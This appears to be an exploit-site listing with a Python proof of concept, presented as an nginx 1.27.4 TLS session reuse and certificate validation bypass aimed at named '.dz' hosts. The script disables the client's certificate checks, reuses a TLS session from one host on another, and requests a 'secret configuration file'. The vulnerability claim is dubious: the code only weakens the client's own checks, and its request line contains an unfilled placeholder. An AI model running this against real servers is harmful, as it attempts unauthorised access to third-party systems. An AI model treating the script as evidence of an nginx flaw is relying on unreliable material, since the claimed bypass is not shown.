Exploit for 📄 nginx 1.27.4 Insecure TLS Session Reuse / SSL Certificate Validation Bypass

Name: Exploit for 📄 nginx 1.27.4 Insecure TLS Session Reuse / SSL Certificate Validation Bypass
Rating: 5 (6 reviews)
2026-06-16 | CVSS 5.3
## https://sploitus.com/exploit?id=PACKETSTORM:223526
==================================================================================================================================
    | # Title     : nginx 1.27.4 Insecure TLS Session Reuse and SSL Certificate Validation Bypass                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://nginx.org/                                                                                               |
    ==================================================================================================================================
    
    [+] Summary    : reuse a TLS/SSL session obtained from one server when connecting to a different server while completely disabling certificate and hostname verification. 
                     The script establishes encrypted connections, captures a TLS session object, attempts session resumption on another host, and requests a protected API endpoint.
    
    [+] POc        :  
    
    #!/usr/bin/env python3
    
    import ssl
    import socket
    
    def create_insecure_context():
        """Create an SSL context that does not verify the certificate"""
        context = ssl.create_default_context()
        context.check_hostname = False 
        context.verify_mode = ssl.CERT_NONE 
        return context
    
    source_server = "target01.gov.dz"
    target_server = "target02.dz"
    
    print(f" Starting attack from {source_server} to {target_server}")
    print("Preparing connection (without certificate verification)...")
    ssl_context1 = create_insecure_context()
    print(f" Connecting to {source_server}...")
    conn1 = socket.create_connection((source_server, 443))
    secure_conn1 = ssl_context1.wrap_socket(conn1, server_hostname=source_server)
    print(" Stealing session...")
    stolen_session = secure_conn1.session
    secure_conn1.close()
    print(f"Session obtained: {stolen_session}")
    print(f"\n Attempting to enter {target_server} using the stolen session...")
    conn2 = socket.create_connection((target_server, 443))
    secure_conn2 = ssl_context1.wrap_socket(conn2, server_hostname=target_server, session=stolen_session)
    
    print("Requesting secret configuration file...")
    request = f"GET 'LINK API'  HTTP/1.1\r\nHost: {target_server}\r\nConnection: close\r\n\r\n"
    secure_conn2.send(request.encode())
    
    response = secure_conn2.recv(8000)
    secure_conn2.close()
    
    if b"200 OK" in response:
        print("\nAttack Succeeded! Entered the secret system!")
        print("\n" + "="*50)
        print("Leaked Data:")
        print("="*50)
    
        if b'\r\n\r\n' in response:
            body = response.split(b'\r\n\r\n', 1)[1]
            try:
                print(body.decode('utf-8', errors='ignore')[:1500])
            except:
                print(body[:1500])
    else:
        print("\n Attack Failed")
        print(f"Server response: {response[:200]}")
    
    
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================